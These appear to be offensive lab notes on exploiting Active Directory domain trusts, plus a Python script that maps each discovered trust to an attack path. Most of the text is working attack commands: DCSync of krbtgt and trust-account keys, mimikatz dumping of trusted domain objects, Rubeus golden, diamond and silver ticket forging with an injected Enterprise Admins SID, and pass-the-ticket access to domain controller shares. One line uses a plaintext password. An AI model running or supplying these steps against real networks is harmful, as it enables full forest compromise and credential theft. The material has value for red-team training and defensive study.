ldapsearch (objectClass=trustedDomain)
ldapsearch (objectClass=trustedDomain) --attributes trustPartner,trustDirection,trustAttributes,flatName
ldapsearch (samAccountType=805306370) --attributes samAccountName
# 805306370 = SAM_TRUST_ACCOUNT: interdomain trust accounts, named <partner NetBIOS name>$
# Output: sAMAccountName: PARTNER$
| Value | Meaning |
|---|---|
| 0 | TRUST_DIRECTION_DISABLED |
| 1 | TRUST_DIRECTION_INBOUND |
| 2 | TRUST_DIRECTION_OUTBOUND |
| 3 | TRUST_DIRECTION_BIDIRECTIONAL |
| Value | Flag | Description |
|---|---|---|
| 1 | TRUST_ATTRIBUTE_NON_TRANSITIVE | Non-transitive trust |
| 4 | TRUST_ATTRIBUTE_QUARANTINED_DOMAIN | SID filtering enabled |
| 8 | TRUST_ATTRIBUTE_FOREST_TRANSITIVE | Transitive between forests |
| 32 | TRUST_ATTRIBUTE_WITHIN_FOREST | Between domains in same forest |
| 64 | TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL | Cross-forest trust treated as an external trust for SID-filtering purposes (this relaxes the stricter forest-trust filtering; it does not add filtering) |
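Added example, not part of the original notes: a small parser that takes ldapsearch-style TDO output, decodes trustDirection and trustAttributes into the names from the two tables above, and maps each trust to the attack path used further down (same forest, inbound, outbound). The LDAP output, partner names and the third trust are constructed for the example.

```python
# Added example (not part of the original notes): decode TDO attributes and map
# each trust to the attack path these notes use. Sample output is constructed.

TRUST_DIRECTION = {
    0: "TRUST_DIRECTION_DISABLED",
    1: "TRUST_DIRECTION_INBOUND",        # partner trusts us: we are the trusted domain
    2: "TRUST_DIRECTION_OUTBOUND",       # we trust partner: we are the trusting domain
    3: "TRUST_DIRECTION_BIDIRECTIONAL",
}

TRUST_ATTRIBUTES = {
    0x01: "TRUST_ATTRIBUTE_NON_TRANSITIVE",
    0x02: "TRUST_ATTRIBUTE_UPLEVEL_ONLY",
    0x04: "TRUST_ATTRIBUTE_QUARANTINED_DOMAIN",   # SID filtering enforced
    0x08: "TRUST_ATTRIBUTE_FOREST_TRANSITIVE",
    0x10: "TRUST_ATTRIBUTE_CROSS_ORGANIZATION",
    0x20: "TRUST_ATTRIBUTE_WITHIN_FOREST",
    0x40: "TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL",
    0x80: "TRUST_ATTRIBUTE_USES_RC4_ENCRYPTION",
}

# Constructed sample of "ldapsearch (objectClass=trustedDomain) --attributes
# trustPartner,trustDirection,trustAttributes,flatName" as seen from a child domain
# that also has an inbound external trust and a non-transitive outbound trust.
SAMPLE_TDO_OUTPUT = """\
trustPartner: inlanefreight.local
trustDirection: 3
trustAttributes: 32
flatName: INLANEFREIGHT

trustPartner: partner.com
trustDirection: 1
trustAttributes: 4
flatName: PARTNER

trustPartner: legacy.example
trustDirection: 2
trustAttributes: 5
flatName: LEGACY
"""


def parse_tdos(text):
    """Split blank-line-separated 'attr: value' records into dicts."""
    records = []
    for block in text.strip().split("\n\n"):
        rec = {}
        for line in block.splitlines():
            attr, _, value = line.partition(": ")
            rec[attr] = value
        records.append({
            "partner": rec["trustPartner"],
            "flat_name": rec["flatName"],
            "direction": int(rec["trustDirection"]),
            "attributes": int(rec["trustAttributes"]),
        })
    return records


def decode_attributes(value):
    """Flag names set in a trustAttributes bitmask, lowest bit first."""
    return [name for bit, name in TRUST_ATTRIBUTES.items() if value & bit]


def sid_filtering(attrs):
    """How extra SIDs / sIDHistory on tickets crossing this trust are treated."""
    if "TRUST_ATTRIBUTE_WITHIN_FOREST" in attrs:
        return "none (intra-forest: an injected <root-sid>-519 is honoured)"
    if "TRUST_ATTRIBUTE_QUARANTINED_DOMAIN" in attrs:
        return "quarantined (only SIDs from the trusted domain itself pass)"
    if "TRUST_ATTRIBUTE_FOREST_TRANSITIVE" in attrs:
        if "TRUST_ATTRIBUTE_TREAT_AS_EXTERNAL" in attrs:
            return "forest trust treated as external (relaxed filtering)"
        return "forest-trust filtering (only SIDs from the trusted forest's domains pass)"
    return "not enforced (external trust without QUARANTINED_DOMAIN)"


def attack_path(trust):
    """Map direction + attributes to the strategy used in these notes."""
    attrs = decode_attributes(trust["attributes"])
    d = trust["direction"]
    if "TRUST_ATTRIBUTE_WITHIN_FOREST" in attrs:
        return "same forest: golden/diamond ticket carrying <forest-root-sid>-519 in ExtraSids"
    if d == 1:
        return ("we are trusted: find foreignSecurityPrincipals in %s, forge a referral TGT "
                "with the %s$ trust key" % (trust["partner"], trust["flat_name"]))
    if d == 2:
        return "we are trusting: dcsync our TDO for the trust key, asktgt as <our-netbios>$ against %s" % trust["partner"]
    if d == 3:
        return "bidirectional: either side's technique applies"
    return "disabled: no authentication crosses this trust"


def summarise(text):
    rows = []
    for t in parse_tdos(text):
        attrs = decode_attributes(t["attributes"])
        rows.append({"partner": t["partner"], "direction": TRUST_DIRECTION[t["direction"]],
                     "attributes": attrs, "sid_filtering": sid_filtering(attrs),
                     "attack_path": attack_path(t)})
    return rows


if __name__ == "__main__":
    for row in summarise(SAMPLE_TDO_OUTPUT):
        print(row)
```

Paste real ldapsearch output into `summarise()`; the `sid_filtering` line is the check to read before spending time on a SID-history or extra-SID approach across a cross-forest trust.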
Parent-child trusts are bidirectional and transitive, and SID filtering is not applied inside a forest, so DA in a child domain escalates to Enterprise Admin in the forest root by placing the root's Enterprise Admins SID (<parent-domain-sid>-519) in the ExtraSids of a forged ticket.
dcsync dublin.inlanefreight.local DUBLIN\krbtgt
# child krbtgt AES256 key (needs DA / replication rights in the child)
ldapsearch (objectClass=domain) --attributes objectSid
# child domain SID (current domain)
ldapsearch (objectClass=domain) --attributes objectSid --hostname ilf-dc-1.inlanefreight.local --dn DC=inlanefreight,DC=local
# forest root (parent) domain SID, queried from the parent DC
C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:<child-krbtgt-aes256> /user:Administrator /domain:dublin.inlanefreight.local /sid:<child-domain-sid> /sids:<parent-domain-sid>-519 /nowrap
Parameters:
/aes256 - child domain's krbtgt AES256 key
/user - user to impersonate
/domain - child domain FQDN
/sid - child domain SID
/sids - parent domain SID with -519 (Enterprise Admins RID) appended, injected as an extra SID
Save to file:
C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe golden /aes256:<hash> /user:Administrator /domain:dublin.inlanefreight.local /sid:<child-sid> /sids:<parent-sid>-519 /outfile:C:\Users\Attacker\Desktop\golden
kerberos_ticket_use C:\Users\Attacker\Desktop\golden
run klist
ls \\ilf-dc-1\c$
# C$ on the forest-root DC: only works if the parent honoured the injected -519 SID
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /sids:<parent-domain-sid>-512 /krbkey:<child-krbtgt-aes256> /nowrap
# diamond variant: /tgtdeleg obtains a real TGT for the current user, /krbkey (child krbtgt key) decrypts it and re-encrypts it with the modified PAC. -512 here is the parent's Domain Admins; use -519 for Enterprise Admins as in the golden example
Inbound trust (trustDirection 1 on our TDO): the partner trusts our domain, so principals from our (trusted) domain can be granted access to resources in the trusting domain.
ldapsearch (objectClass=trustedDomain) --attributes trustDirection,trustPartner,trustAttributes,flatName
# trustDirection: 1 = INBOUND = you're in trusted domain
ldapsearch (objectClass=foreignSecurityPrincipal) --attributes cn,memberOf --hostname partner.com --dn DC=partner,DC=com
# each FSP's cn is a SID; entries starting with our domain SID are our principals that have been granted access (memberOf) in the trusting domain
ldapsearch (objectSid=S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-XXXX)
# resolve that SID in our own domain to see which user or group it is
ldapsearch (samAccountType=805306369) --attributes samAccountName --dn DC=partner,DC=com --hostname partner.com
# 805306369 = SAM_MACHINE_ACCOUNT: enumerate hosts in the trusting domain to pick a target
Get inter-realm key (the trust account PARTNER$ in our domain holds the key the partner uses to validate referral TGTs from us):
make_token INLANEFREIGHT\bjohnson Passw0rd!
# account with DCSync (replication) rights in INLANEFREIGHT
dcsync inlanefreight.local INLANEFREIGHT\PARTNER$
rev2self
Forge referral ticket (an inter-realm TGT for krbtgt/partner.com encrypted with the PARTNER$ RC4 key; /groups lists RIDs of groups in our domain, including the ones the FSPs pointed at):
C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe silver /user:jyoung /domain:INLANEFREIGHT.LOCAL /sid:<trusted-domain-sid> /id:<user-rid> /groups:513,1106,6102 /service:krbtgt/partner.com /rc4:<ntlm-hash> /nowrap
Request service ticket in trusting domain:
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgs /service:cifs/par-jmp-1.partner.com /dc:par-dc-1.partner.com /ticket:<inter-realm-tgt> /nowrap
Inject and access:
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /ticket:<service-ticket>
run klist
ls \\par-jmp-1.partner.com\c$
Outbound trust (trustDirection 2 on our TDO): we are the trusting domain, the "wrong" side, so our principals get no direct access in the trusted domain. In this section our domain is partner.com and the trusted domain is inlanefreight.local.
ldapsearch (objectClass=trustedDomain) --attributes trustDirection,trustPartner,trustAttributes,flatName
# trustDirection: 2 = OUTBOUND = you're in trusting domain
ldapsearch (objectClass=trustedDomain) --attributes name,objectGUID
# objectGUID: 288d9ee6-2b3c-42aa-bef8-959ab4e484ed
mimikatz lsadump::dcsync /domain:partner.com /guid:{288d9ee6-2b3c-42aa-bef8-959ab4e484ed}
# dcsync the TDO itself (it lives in our own domain) to get the trust keys: [Out] = current key, [Out-1] = previous key
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:PARTNER$ /domain:INLANEFREIGHT.LOCAL /dc:ilf-dc-1.inlanefreight.local /rc4:<inter-realm-key> /nowrap
# the trust account PARTNER$ (named after our domain) exists as an account in the trusted domain and its NTLM hash is the [Out] key, so we can request a TGT there as that account
make_token INLANEFREIGHT\PARTNER$ FakePass
# sacrificial logon session to hold the ticket; make_token does not verify the password
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe ptt /ticket:<ticket>
run klist
ldapsearch (objectClass=domain) --dn DC=inlanefreight,DC=local --attributes name,objectSid --hostname inlanefreight.local
# confirms the trusted domain accepts the TGT; PARTNER$ only has the rights of an ordinary domain member there, so it is a stepping stone for enumeration and further attacks, not admin access
| Scenario | Trust Direction | Strategy |
|---|---|---|
| Child → Parent | Bidirectional, within forest (no SID filtering) | Golden or diamond ticket with the forest-root Enterprise Admins SID (<parent-sid>-519) in ExtraSids |
| Trusted → Trusting | Inbound (1) | Find foreign principals, forge referral tickets |
| Trusting → Trusted | Outbound (2) | DCSync trust account, use as stepping stone |